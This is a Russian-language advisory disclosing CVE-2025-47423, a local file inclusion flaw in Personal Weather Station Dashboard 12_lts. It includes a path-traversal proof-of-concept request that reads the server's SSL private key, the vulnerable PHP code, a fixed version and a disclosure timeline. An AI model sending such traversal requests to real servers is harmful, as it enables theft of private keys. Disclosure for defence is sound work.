
Подробное раскрытие информации об уязвимости CVE-2025-47423: Включение локальных файлов в панели управления персональной метеостанцией 12_lts. Включает PoC, анализ уязвимого кода и рекомендации по безопасному исправлению для обучения защите.
Обнаружено: Matthew Eagle
Статус: Публичное раскрытие
Дата сообщения: 2025-05-05
CVE ID: CVE-2025-47423
Уязвимость локального включения файлов (LFI) в Personal Weather Station Dashboard версии 12_lts позволяет неаутентифицированным удалённым злоумышленникам читать произвольные файлы на сервере. Использование этой ошибки даёт доступ к конфиденциальным файлам, включая закрытые SSL-ключи, что потенциально нарушает конфиденциальность и целостность HTTPS-соединений.
/others/_test.phptest (через GET)Эта ошибка позволяет удалённым злоумышленникам:
server.key)CVSS: 5.8 Средний
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
Ответ:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
str_replace недостаточен для предотвращения обхода каталогов.
basename() и проверяйте по разрешённым файлам$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| Дата | Событие |
|---|---|
| 2025-05-05 | Уязвимость сообщена модераторам PWS Dashboard |
| 2025-05-06 | Подтверждение и тестирование замечено |
| 2025-05-07 | CVE-2025-47423 зарезервирован через MITRE |
| TBD | Публичный патч и запись CVE ожидаются |
Если вы используете Personal Weather Station Dashboard 12_lts, вам следует:
_test.phpУязвимость обнаружена и ответственно раскрыта Matthew Eagle
Контакты: [email protected]
Раскрытие согласовано в соответствии с принципами ответственного раскрытия. Этот документ опубликован в образовательных и защитных целях.